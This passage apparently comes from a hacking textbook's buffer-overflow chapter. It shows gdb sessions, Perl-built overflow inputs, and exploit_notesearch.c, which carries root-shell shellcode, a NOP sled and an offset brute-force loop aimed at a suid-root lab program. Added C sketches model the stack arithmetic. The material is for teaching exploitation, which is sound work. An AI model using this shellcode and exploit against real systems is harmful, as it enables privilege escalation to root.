0x080484e3 <main+111>: jmp 0x80484f1 <main+125>

0x080484e5 <main+113>: mov DWORD PTR [esp],0x804864d

0x080484ec <main+120>: call 0x804831c <printf@plt>

0x080484f1 <main+125>: leave

0x080484f2 <main+126>: ret

End of assembler dump.

(gdb)

Notice the two instructions at main+63 and main+66 (shown in bold in the listing above). At this point, the EAX register contains a pointer to the first command-line argument. This is also the argument to check_authentication(). The first of these instructions writes EAX to where ESP is pointing (the top of the stack). This starts the stack frame for check_authentication() with the function argument. The second instruction is the actual call. This instruction pushes the address of the next instruction to the stack and moves the execution pointer register (EIP) to the start of the check_authentication() function. The address pushed to the stack is the return address for the stack frame. In this case, the address of the next instruction is 0x080484bb, so that is the return address.

(gdb) disass check_authentication

Dump of assembler code for function check_authentication:

0x08048414 <check_authentication+0>: push ebp

0x08048415 <check_authentication+1>: mov ebp,esp

0x08048417 <check_authentication+3>: sub esp,0x38

...

0x08048472 <check_authentication+94>: leave

0x08048473 <check_authentication+95>: ret

End of assembler dump.

(gdb) p 0x38

$3 = 56

(gdb) p 0x38 + 4 + 4

$4 = 64

(gdb)

Execution will continue into the check_authentication() function as EIP is changed, and the first few instructions (shown in bold above) finish saving memory for the stack frame. These instructions are known as the function prologue. The first two instructions are for the saved frame pointer, and the third instruction subtracts 0x38 from ESP. This saves 56 bytes for the local variables of the function. The return address and the saved frame pointer are already pushed to the stack and account for the additional 8 bytes of the 64-byte stack frame.
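
The arithmetic that gdb performs above can also be written as a small C helper. This is only a sketch under the assumptions of this example: a 32-bit x86 target where the return address and the saved frame pointer each occupy 4 bytes. The names frame_size() and esp_after_prologue() are hypothetical and do not come from the book's sources.

```c
#include <assert.h>
#include <stdint.h>

/* Assumption: 32-bit x86, so the return address pushed by call and the
   frame pointer pushed by the prologue are 4 bytes each. */
enum { RETURN_ADDR_BYTES = 4, SAVED_EBP_BYTES = 4 };

/* Total frame size, given the amount the prologue subtracts from ESP. */
static uint32_t frame_size(uint32_t local_bytes)
{
    return local_bytes + SAVED_EBP_BYTES + RETURN_ADDR_BYTES;
}

/* ESP inside the function, given ESP just before the call instruction. */
static uint32_t esp_after_prologue(uint32_t esp_before_call, uint32_t local_bytes)
{
    assert(esp_before_call >= frame_size(local_bytes)); /* no wraparound */
    return esp_before_call - frame_size(local_bytes);
}
```

With the values from this session, frame_size(0x38) gives 64, and esp_after_prologue(0xbffff7e0, 0x38) gives 0xbffff7a0, which matches the ESP value seen at the second breakpoint.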

When the function finishes, the leave and ret instructions remove the stack frame and set the execution pointer register (EIP) to the saved return address in the stack frame. This brings the program execution back to the next instruction in main() after the function call at 0x080484bb. This process happens every time a function is called in any program.

(gdb) x/32xw $esp

0xbffff7a0: 0x00000000 0x08049744 0xbffff7b8 0x080482d9

0xbffff7b0: 0xb7f9f729 0xb7fd6ff4 0xbffff7e8 0x00000000

0xbffff7c0: 0xb7fd6ff4 0xbffff880 0xbffff7e8 0xb7fd6ff4

0xbffff7d0: 0xb7ff47b0 0x08048510 0xbffff7e8 0x080484bb

0xbffff7e0: 0xbffff9b7 0x08048510 0xbffff848 0xb7eafebc

0xbffff7f0: 0x00000002 0xbffff874 0xbffff880 0xb8001898

0xbffff800: 0x00000000 0x00000001 0x00000001 0x00000000

0xbffff810: 0xb7fd6ff4 0xb8000ce0 0x00000000 0xbffff848

(gdb) cont

Continuing.

Breakpoint 3, check_authentication (password=0xbffff9b7 'A' <repeats 30 times>)

at auth_overflow2.c:16

16 return auth_flag;

(gdb) x/32xw $esp

0xbffff7a0: 0xbffff7c0 0x080485dc 0xbffff7b8 0x080482d9

0xbffff7b0: 0xb7f9f729 0xb7fd6ff4 0xbffff7e8 0x00000000

0xbffff7c0: 0x41414141 0x41414141 0x41414141 0x41414141

0xbffff7d0: 0x41414141 0x41414141 0x41414141 0x08004141

0xbffff7e0: 0xbffff9b7 0x08048510 0xbffff848 0xb7eafebc

0xbffff7f0: 0x00000002 0xbffff874 0xbffff880 0xb8001898

0xbffff800: 0x00000000 0x00000001 0x00000001 0x00000000

0xbffff810: 0xb7fd6ff4 0xb8000ce0 0x00000000 0xbffff848

(gdb) cont

Continuing.

Program received signal SIGSEGV, Segmentation fault.

0x08004141 in ?? ()

(gdb)

When some of the bytes of the saved return address are overwritten, the program will still try to use that value to restore the execution pointer register (EIP). This usually results in a crash, since execution is essentially jumping to a random location. But this value doesn't need to be random. If the overwrite is controlled, execution can, in turn, be controlled to jump to a specific location. But where should we tell it to go?
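
The crash address 0x08004141 can be reproduced on paper. The sketch below models strcpy() writing a run of identical bytes plus the terminating null byte toward a 4-byte little-endian word, and reports what the word holds afterward. It is a simplified model, not the real strcpy(), and the function name word_after_copy() is hypothetical. The 28-byte gap is taken from the gdb output above (0xbffff7dc minus 0xbffff7c0).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Model strcpy() writing len copies of fill plus a terminating NUL,
   starting gap bytes below a 4-byte little-endian word holding saved.
   Returns the value of that word after the copy. */
static uint32_t word_after_copy(uint32_t saved, size_t gap, size_t len,
                                unsigned char fill)
{
    unsigned char slot[4];
    uint32_t result = 0;
    size_t pos;
    int i;

    assert(len < SIZE_MAX);                 /* keeps the loop below finite */

    for (i = 0; i < 4; i++)                 /* split into little-endian bytes */
        slot[i] = (unsigned char)((saved >> (8 * i)) & 0xff);

    for (pos = 0; pos <= len; pos++) {      /* pos == len is the NUL byte */
        if (pos >= gap && pos - gap < 4)
            slot[pos - gap] = (unsigned char)((pos < len) ? fill : 0);
    }

    for (i = 0; i < 4; i++)                 /* reassemble the word */
        result |= (uint32_t)slot[i] << (8 * i);
    return result;
}
```

Calling word_after_copy(0x080484bb, 28, 30, 'A') yields 0x08004141: two As land on the low bytes, the null terminator lands on the third byte, and the original high byte 0x08 survives.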

Experimenting with BASH

Since so much of hacking is rooted in exploitation and experimentation, the ability to quickly try different things is vital. The BASH shell and Perl are common on most machines and are all that is needed to experiment with exploitation.

Perl is an interpreted programming language with a print command that happens to be particularly suited to generating long sequences of characters. Perl can be used to execute instructions on the command line by using the -e switch like this:

reader@hacking:~/booksrc $ perl -e 'print "A" x 20;'

AAAAAAAAAAAAAAAAAAAA

This command tells Perl to execute the commands found between the single quotes—in this case, a single command of print "A" x 20;. This command prints the character A 20 times.

Any character, such as a nonprintable character, can also be printed by using \x##, where ## is the hexadecimal value of the character. In the following example, this notation is used to print the character A, which has the hexadecimal value of 0x41.

reader@hacking:~/booksrc $ perl -e 'print "\x41" x 20;'

AAAAAAAAAAAAAAAAAAAA

In addition, string concatenation can be done in Perl with a period (.). This can be useful when stringing multiple addresses together.

reader@hacking:~/booksrc $ perl -e 'print "A"x20 . "BCD" . "\x61\x66\x67\x69"x2 . "Z";'

AAAAAAAAAAAAAAAAAAAABCDafgiafgiZ

An entire shell command can be executed like a function, returning its output in place. This is done by surrounding the command with parentheses and prefixing a dollar sign. Here are two examples:

reader@hacking:~/booksrc $ $(perl -e 'print "uname";')

Linux

reader@hacking:~/booksrc $ una$(perl -e 'print "m";')e

Linux

reader@hacking:~/booksrc $

In each case, the output of the command found between the parentheses is substituted for the command, and the command uname is executed. This exact command-substitution effect can be accomplished with grave accent marks (`, the tilted single quote on the tilde key). You can use whichever syntax feels more natural for you; however, the parentheses syntax is easier to read for most people.

reader@hacking:~/booksrc $ u`perl -e 'print "na";'`me

Linux

reader@hacking:~/booksrc $ u$(perl -e 'print "na";')me

Linux

reader@hacking:~/booksrc $

Command substitution and Perl can be used in combination to quickly generate overflow buffers on the fly. You can use this technique to easily test the overflow_example.c program with buffers of precise lengths.

reader@hacking:~/booksrc $ ./overflow_example $(perl -e 'print "A"x30')

[BEFORE] buffer_two is at 0xbffff7e0 and contains 'two'

[BEFORE] buffer_one is at 0xbffff7e8 and contains 'one'

[BEFORE] value is at 0xbffff7f4 and is 5 (0x00000005)

[STRCPY] copying 30 bytes into buffer_two

[AFTER] buffer_two is at 0xbffff7e0 and contains 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'

[AFTER] buffer_one is at 0xbffff7e8 and contains 'AAAAAAAAAAAAAAAAAAAAAA'

[AFTER] value is at 0xbffff7f4 and is 1094795585 (0x41414141)

Segmentation fault (core dumped)

reader@hacking:~/booksrc $ gdb -q

(gdb) print 0xbffff7f4 - 0xbffff7e0

$1 = 20

(gdb) quit

reader@hacking:~/booksrc $ ./overflow_example $(perl -e 'print "A"x20 . "ABCD"')

[BEFORE] buffer_two is at 0xbffff7e0 and contains 'two'

[BEFORE] buffer_one is at 0xbffff7e8 and contains 'one'

[BEFORE] value is at 0xbffff7f4 and is 5 (0x00000005)

[STRCPY] copying 24 bytes into buffer_two

[AFTER] buffer_two is at 0xbffff7e0 and contains 'AAAAAAAAAAAAAAAAAAAAABCD'

[AFTER] buffer_one is at 0xbffff7e8 and contains 'AAAAAAAAAAAAABCD'

[AFTER] value is at 0xbffff7f4 and is 1145258561 (0x44434241)

reader@hacking:~/booksrc $

In the output above, GDB is used as a hexadecimal calculator to figure out the distance between buffer_two (0xbffff7e0) and the value variable (0xbffff7f4), which turns out to be 20 bytes. Using this distance, the value variable is overwritten with the exact value 0x44434241, since the characters A, B, C, and D have the hex values of 0x41, 0x42, 0x43, and 0x44, respectively. The first character is the least significant byte, due to the little-endian architecture. This means if you wanted to control the value variable with something exact, like 0xdeadbeef, you must write those bytes into memory in reverse order.

reader@hacking:~/booksrc $ ./overflow_example $(perl -e 'print "A"x20 .

"\xef\xbe\xad\xde"')

[BEFORE] buffer_two is at 0xbffff7e0 and contains 'two'

[BEFORE] buffer_one is at 0xbffff7e8 and contains 'one'

[BEFORE] value is at 0xbffff7f4 and is 5 (0x00000005)

[STRCPY] copying 24 bytes into buffer_two

[AFTER] buffer_two is at 0xbffff7e0 and contains 'AAAAAAAAAAAAAAAAAAAA??'

[AFTER] buffer_one is at 0xbffff7e8 and contains 'AAAAAAAAAAAA??'

[AFTER] value is at 0xbffff7f4 and is -559038737 (0xdeadbeef)

reader@hacking:~/booksrc $
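
The byte ordering at work here can be checked with a short C sketch. It assumes nothing about the host machine's own endianness, because it builds the little-endian layout with shifts rather than by reading memory through an integer pointer. The helper names le32_byte() and unpack_le32() are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Return the byte stored at position index (0 = lowest address) when a
   32-bit value is written to memory in little-endian order. */
static unsigned char le32_byte(uint32_t value, int index)
{
    assert(index >= 0 && index < 4);
    return (unsigned char)((value >> (8 * index)) & 0xff);
}

/* Read four consecutive bytes as a little-endian 32-bit value. */
static uint32_t unpack_le32(const unsigned char *in)
{
    assert(in != NULL);
    return (uint32_t)in[0]
         | ((uint32_t)in[1] << 8)
         | ((uint32_t)in[2] << 16)
         | ((uint32_t)in[3] << 24);
}
```

For 0xdeadbeef, le32_byte() returns 0xef, 0xbe, 0xad, 0xde for positions 0 through 3, which is the order used in the Perl command above. In the other direction, the four characters ABCD unpack to 0x44434241.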

This technique can be applied to overwrite the return address in the auth_overflow2.c program with an exact value. In the example below, we will overwrite the return address with a different address in main().

reader@hacking:~/booksrc $ gcc -g -o auth_overflow2 auth_overflow2.c

reader@hacking:~/booksrc $ gdb -q ./auth_overflow2

Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".

(gdb) disass main

Dump of assembler code for function main:

0x08048474 <main+0>: push ebp

0x08048475 <main+1>: mov ebp,esp

0x08048477 <main+3>: sub esp,0x8

0x0804847a <main+6>: and esp,0xfffffff0

0x0804847d <main+9>: mov eax,0x0

0x08048482 <main+14>: sub esp,eax

0x08048484 <main+16>: cmp DWORD PTR [ebp+8],0x1

0x08048488 <main+20>: jg 0x80484ab <main+55>

0x0804848a <main+22>: mov eax,DWORD PTR [ebp+12]

0x0804848d <main+25>: mov eax,DWORD PTR [eax]

0x0804848f <main+27>: mov DWORD PTR [esp+4],eax

0x08048493 <main+31>: mov DWORD PTR [esp],0x80485e5

0x0804849a <main+38>: call 0x804831c <printf@plt>

0x0804849f <main+43>: mov DWORD PTR [esp],0x0

0x080484a6 <main+50>: call 0x804833c <exit@plt>

0x080484ab <main+55>: mov eax,DWORD PTR [ebp+12]

0x080484ae <main+58>: add eax,0x4

0x080484b1 <main+61>: mov eax,DWORD PTR [eax]

0x080484b3 <main+63>: mov DWORD PTR [esp],eax

0x080484b6 <main+66>: call 0x8048414 <check_authentication>

0x080484bb <main+71>: test eax,eax

0x080484bd <main+73>: je 0x80484e5 <main+113>

0x080484bf <main+75>: mov DWORD PTR [esp],0x80485fb

0x080484c6 <main+82>: call 0x804831c <printf@plt>

0x080484cb <main+87>: mov DWORD PTR [esp],0x8048619

0x080484d2 <main+94>: call 0x804831c <printf@plt>

0x080484d7 <main+99>: mov DWORD PTR [esp],0x8048630

0x080484de <main+106>: call 0x804831c <printf@plt>

0x080484e3 <main+111>: jmp 0x80484f1 <main+125>

0x080484e5 <main+113>: mov DWORD PTR [esp],0x804864d

0x080484ec <main+120>: call 0x804831c <printf@plt>

0x080484f1 <main+125>: leave

0x080484f2 <main+126>: ret

End of assembler dump.

(gdb)

This section of code shown in bold contains the instructions that display the Access Granted message. The beginning of this section is at 0x080484bf, so if the return address is overwritten with this value, this block of instructions will be executed. The exact distance between the return address and the start of the password_buffer can change due to different compiler versions and different optimization flags. As long as the start of the buffer is aligned with DWORDs on the stack, this mutability can be accounted for by simply repeating the return address many times. This way, at least one of the instances will overwrite the return address, even if it has shifted around due to compiler optimizations.

reader@hacking:~/booksrc $ ./auth_overflow2 $(perl -e 'print "\xbf\x84\x04\x08"x10')

-=-=-=-=-=-=-=-=-=-=-=-=-=-

Access Granted.

-=-=-=-=-=-=-=-=-=-=-=-=-=-

Segmentation fault (core dumped)

reader@hacking:~/booksrc $

In the example above, the target address of 0x080484bf is repeated 10 times to ensure the return address is overwritten with the new target address. When the check_authentication() function returns, execution jumps directly to the new target address instead of returning to the next instruction after the call. This gives us more control; however, we are still limited to using instructions that exist in the original programming.
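
Why repetition works, and when it fails, comes down to alignment and length. The following sketch is an illustration only, with a hypothetical function name. It assumes a 4-byte address and that the repeated copies start at the first byte of the buffer.

```c
#include <assert.h>
#include <stddef.h>

/* Returns 1 if a 4-byte value repeated repeats times from the start of a
   buffer places one whole, correctly aligned copy over a 4-byte slot that
   begins distance bytes past the start of the buffer; otherwise 0. */
static int repeat_covers_slot(size_t distance, size_t repeats)
{
    assert(repeats > 0);            /* an empty string overwrites nothing */
    if (distance % 4 != 0)          /* copies would straddle the slot */
        return 0;
    return distance / 4 < repeats;  /* slot index falls inside the copies */
}
```

In the gdb session shown earlier, the return address sits 28 bytes past the start of password_buffer (0xbffff7dc minus 0xbffff7c0), so repeat_covers_slot(28, 10) returns 1. A distance that is not a multiple of 4, or one beyond the 40 bytes written, would return 0.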

The notesearch program is vulnerable to a buffer overflow on the line marked in bold here.

int main(int argc, char *argv[]) {

int userid, printing=1, fd; // File descriptor

char searchstring[100];

if(argc > 1) // If there is an arg

strcpy(searchstring, argv[1]); // that is the search string;

else // otherwise,

searchstring[0] = 0; // search string is empty.

The notesearch exploit uses a similar technique to overflow a buffer into the return address; however, it also injects its own instructions into memory and then returns execution there. These instructions are called shellcode, and they tell the program to restore privileges and open a shell prompt. This is especially devastating for the notesearch program, since it is suid root. Since this program expects multiuser access, it runs under higher privileges so it can access its data file, but the program logic prevents the user from using these higher privileges for anything other than accessing the data file—at least that's the intention.

But when new instructions can be injected in and execution can be controlled with a buffer overflow, the program logic is meaningless. This technique allows the program to do things it was never programmed to do, while it's still running with elevated privileges. This is the dangerous combination that allows the notesearch exploit to gain a root shell. Let's examine the exploit further.

reader@hacking:~/booksrc $ gcc -g exploit_notesearch.c

reader@hacking:~/booksrc $ gdb -q ./a.out

Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".

(gdb) list 1

1 #include <stdio.h>

2 #include <stdlib.h>

3 #include <string.h>

4 char shellcode[]=

5 "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"

6 "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"

7 "\xe1\xcd\x80";

8

9 int main(int argc, char *argv[]) {

10 unsigned int i, *ptr, ret, offset=270;

(gdb)

11 char *command, *buffer;

12

13 command = (char *) malloc(200);

14 bzero(command, 200); // Zero out the new memory.

15

16 strcpy(command, "./notesearch \'"); // Start command buffer.

17 buffer = command + strlen(command); // Set buffer at the end.

18

19 if(argc > 1) // Set offset.

20 offset = atoi(argv[1]);

(gdb)

21

22 ret = (unsigned int) &i - offset; // Set return address.

23

24 for(i=0; i < 160; i+=4) // Fill buffer with return address.

25 *((unsigned int *)(buffer+i)) = ret;

26 memset(buffer, 0x90, 60); // Build NOP sled.

27 memcpy(buffer+60, shellcode, sizeof(shellcode)-1);

28

29 strcat(command, "\'");

30

(gdb) break 26

Breakpoint 1 at 0x80485fa: file exploit_notesearch.c, line 26.

(gdb) break 27

Breakpoint 2 at 0x8048615: file exploit_notesearch.c, line 27.

(gdb) break 28

Breakpoint 3 at 0x8048633: file exploit_notesearch.c, line 28.

(gdb)

The notesearch exploit generates a buffer in lines 24 through 27 (shown above in bold). The first part is a for loop that fills the buffer with a 4-byte address stored in the ret variable. The loop increments i by 4 each time. This value is added to the buffer address, and the whole thing is typecast as an unsigned integer pointer. This has a size of 4, so when the whole thing is dereferenced, the entire 4-byte value found in ret is written.

(gdb) run

Starting program: /home/reader/booksrc/a.out

Breakpoint 1, main (argc=1, argv=0xbffff894) at exploit_notesearch.c:26

26 memset(buffer, 0x90, 60); // build NOP sled

(gdb) x/40x buffer

0x804a016: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

0x804a026: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

0x804a036: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

0x804a046: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

0x804a056: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

0x804a066: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

0x804a076: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

0x804a086: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

0x804a096: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

0x804a0a6: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

(gdb) x/s command

0x804a008: "./notesearch

'¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶û

ÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿"

(gdb)

At the first breakpoint, the buffer pointer shows the result of the for loop. You can also see the relationship between the command pointer and the buffer pointer. The next instruction is a call to memset(), which starts at the beginning of the buffer and sets 60 bytes of memory with the value 0x90.

(gdb) cont

Continuing.

Breakpoint 2, main (argc=1, argv=0xbffff894) at exploit_notesearch.c:27

27 memcpy(buffer+60, shellcode, sizeof(shellcode)-1);

(gdb) x/40x buffer

0x804a016: 0x90909090 0x90909090 0x90909090 0x90909090

0x804a026: 0x90909090 0x90909090 0x90909090 0x90909090

0x804a036: 0x90909090 0x90909090 0x90909090 0x90909090

0x804a046: 0x90909090 0x90909090 0x90909090 0xbffff6f6

0x804a056: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

0x804a066: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

0x804a076: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

0x804a086: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

0x804a096: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

0x804a0a6: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

(gdb) x/s command

0x804a008: "./notesearch '", '\220' <repeats 60 times>, "¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿

¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿"

(gdb)

Finally, the call to memcpy() will copy the shellcode bytes into buffer+60.

(gdb) cont

Continuing.

Breakpoint 3, main (argc=1, argv=0xbffff894) at exploit_notesearch.c:29

29 strcat(command, "\'");

(gdb) x/40x buffer

0x804a016: 0x90909090 0x90909090 0x90909090 0x90909090

0x804a026: 0x90909090 0x90909090 0x90909090 0x90909090

0x804a036: 0x90909090 0x90909090 0x90909090 0x90909090

0x804a046: 0x90909090 0x90909090 0x90909090 0x3158466a

0x804a056: 0xcdc931db 0x2f685180 0x6868732f 0x6e69622f

0x804a066: 0x5351e389 0xb099e189 0xbf80cd0b 0xbffff6f6

0x804a076: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

0x804a086: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

0x804a096: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

0x804a0a6: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

(gdb) x/s command

0x804a008: "./notesearch '", '\220' <repeats 60 times>, "1À1Û1É\231°gÍ\200j\vXQh//shh/

bin\211ãQ\211âS\211áÍ\200¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿"

(gdb)

Now the buffer contains the desired shellcode and is long enough to overwrite the return address. The difficulty of finding the exact location of the return address is eased by using the repeated return address technique. But this return address must point to the shellcode located in the same buffer. This means the actual address must be known ahead of time, before it even goes into memory. This can be a difficult prediction to try to make with a dynamically changing stack.

Fortunately, there is another hacking technique, called the NOP sled, that can assist with this difficult chicanery. NOP is an assembly instruction that is short for no operation. It is a single-byte instruction that does absolutely nothing. These instructions are sometimes used to waste computational cycles for timing purposes and are actually necessary in the SPARC processor architecture, due to instruction pipelining. In this case, NOP instructions are going to be used for a different purpose: as a fudge factor. We'll create a large array (or sled) of these NOP instructions and place it before the shellcode; then, if the EIP register points to any address found in the NOP sled, it will increment while executing each NOP instruction, one at a time, until it finally reaches the shellcode. This means that as long as the return address is overwritten with any address found in the NOP sled, the EIP register will slide down the sled to the shellcode, which will execute properly. On the x86 architecture, the NOP instruction is equivalent to the hex byte 0x90. This means our completed exploit buffer looks something like this:

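Figure 0x300-2. Exploit buffer layout: NOP sled, followed by the shellcode, followed by the repeated return address.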

Even with a NOP sled, the approximate location of the buffer in memory must be predicted in advance. One technique for approximating the memory location is to use a nearby stack location as a frame of reference. By subtracting an offset from this location, the relative address of any variable can be obtained.

From exploit_notesearch.c

unsigned int i, *ptr, ret, offset=270;

char *command, *buffer;

command = (char *) malloc(200);

bzero(command, 200); // Zero out the new memory.

strcpy(command, "./notesearch \'"); // Start command buffer.

buffer = command + strlen(command); // Set buffer at the end.

if(argc > 1) // Set offset.

offset = atoi(argv[1]);

ret = (unsigned int) &i - offset; // Set return address.

In the notesearch exploit, the address of the variable i in main()'s stack frame is used as a point of reference. Then an offset is subtracted from that value; the result is the target return address. This offset was previously determined to be 270, but how is this number calculated?
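
The reference-minus-offset calculation can be isolated into a small helper. The sketch below is an assumption-laden illustration, not the book's code: it uses uintptr_t instead of unsigned int so that the pointer value is not truncated on 64-bit systems, and both function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Guess a target address by subtracting an offset from a known stack
   address. uintptr_t avoids truncating pointers on 64-bit systems; the
   original code assumes a 32-bit unsigned int is wide enough. */
static uintptr_t target_from_reference(uintptr_t reference, unsigned int offset)
{
    assert(reference >= offset);            /* avoid wrapping below zero */
    return reference - offset;
}

/* The same idea, using the address of a real local variable as the
   reference point, as the exploit does with its variable i. */
static uintptr_t target_near_local(unsigned int offset)
{
    unsigned int i = 0;                     /* plays the role of i in main() */
    return target_from_reference((uintptr_t)&i, offset);
}
```

As a consistency check, the gdb dump of the exploit buffer shows ret as 0xbffff6f6 with the default offset of 270. That implies the variable i sat at 0xbffff804 in that run, which is an inference from the dump rather than a value printed in the session.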

The easiest way to determine this offset is experimentally. The debugger will shift memory around slightly and will drop privileges when the suid root notesearch program is executed, making debugging much less useful in this case.

Since the notesearch exploit allows an optional command-line argument to define the offset, different offsets can quickly be tested.

reader@hacking:~/booksrc $ gcc exploit_notesearch.c

reader@hacking:~/booksrc $ ./a.out 100

-------[ end of note data ]-------

reader@hacking:~/booksrc $ ./a.out 200

-------[ end of note data ]-------

reader@hacking:~/booksrc $

However, doing this manually is tedious and stupid. BASH also has a for loop that can be used to automate this process. The seq command is a simple program that generates sequences of numbers, which is typically used with looping.

reader@hacking:~/booksrc $ seq 1 10

1

2

3

4

5

6

7

8

9

10

reader@hacking:~/booksrc $ seq 1 3 10

1

4

7

10

reader@hacking:~/booksrc $

When only two arguments are used, all the numbers from the first argument to the second are generated. When three arguments are used, the middle argument dictates how much to increment each time. This can be used with command substitution to drive BASH's for loop.

reader@hacking:~/booksrc $ for i in $(seq 1 3 10)

> do

> echo The value is $i

> done

The value is 1

The value is 4

The value is 7

The value is 10

reader@hacking:~/booksrc $

The function of the for loop should be familiar, even if the syntax is a little different. The shell variable $i iterates through all the values produced by the command substitution (generated by seq). Then everything between the do and done keywords is executed. This can be used to quickly test many different offsets. Since the NOP sled is 60 bytes long, and we can return anywhere on the sled, there are about 60 bytes of wiggle room. We can safely increment the offset loop with a step of 30 with no danger of missing the sled.

reader@hacking:~/booksrc $ for i in $(seq 0 30 300)

> do

> echo Trying offset $i

> ./a.out $i

> done

Trying offset 0

[DEBUG] found a 34 byte note for user id 999

[DEBUG] found a 41 byte note for user id 999

When the right offset is used, the return address is overwritten with a value that points somewhere on the NOP sled. When execution tries to return to that location, it will just slide down the NOP sled into the injected shellcode instructions. This is how the default offset value was discovered.
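
The claim that a step of 30 cannot miss a 60-byte sled is plain interval arithmetic, and it can be sketched in C. The function name and the numbers used with it are hypothetical and chosen only to illustrate the reasoning; they are not addresses from the notesearch session.

```c
#include <assert.h>

/* Walk offsets 0, step, 2*step, ... up to max_offset and return the first
   offset for which (reference - offset) falls inside the sled, which spans
   sled_len bytes starting at sled_start. Returns -1 if every step misses. */
static long first_offset_in_sled(unsigned long reference,
                                 unsigned long sled_start,
                                 unsigned long sled_len,
                                 unsigned long step,
                                 unsigned long max_offset)
{
    unsigned long offset;

    assert(step > 0);                       /* a zero step would never end */
    for (offset = 0; offset <= max_offset && offset <= reference;
         offset += step) {
        unsigned long target = reference - offset;
        if (target >= sled_start && target - sled_start < sled_len)
            return (long)offset;
    }
    return -1;
}
```

With a made-up reference of 1000 and a 60-byte sled starting at 705, a step of 30 finds the sled at offset 240, while a step of 100 jumps straight over it and returns -1. Any step no larger than the sled length is guaranteed to land at least once, provided the search range reaches the sled.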

Using the Environment

Sometimes a buffer will be too small to hold even shellcode. Fortunately, there are other locations in memory where shellcode can be stashed. Environment variables are used by the user shell for a variety of things, but what they are used for isn't as important as the fact they are located on the stack and can be set from the shell. The example below sets an environment variable called MYVAR to the string test. This environment variable can be accessed by prepending a dollar sign to its name. In addition, the env command will show all the environment variables. Notice there are several default environment variables already set.

reader@hacking:~/booksrc $ export MYVAR=test

reader@hacking:~/booksrc $ echo $MYVAR

test

reader@hacking:~/booksrc $ env

SSH_AGENT_PID=7531

SHELL=/bin/bash

DESKTOP_STARTUP_ID=

TERM=xterm

GTK_RC_FILES=/etc/gtk/gtkrc:/home/reader/.gtkrc-1.2-gnome2

WINDOWID=39845969

OLDPWD=/home/reader

USER=reader

LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;

01:or=4

0;31;01:su=37;41:sg=30;43:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:

*.arj=01;

31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:

*.deb=01;31:*

.rpm=01;31:*.jar=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:

*.pgm=01;35

:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:

*.mov=01;

35:*.mpg=01;35:*.mpeg=01;35:*.avi=01;35:*.fli=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:

*.xwd=01;

35:*.flac=01;35:*.mp3=01;35:*.mpc=01;35:*.ogg=01;35:*.wav=01;35:

SSH_AUTH_SOCK=/tmp/ssh-EpSEbS7489/agent.7489

GNOME_KEYRING_SOCKET=/tmp/keyring-AyzuEi/socket

SESSION_MANAGER=local/hacking:/tmp/.ICE-unix/7489

USERNAME=reader

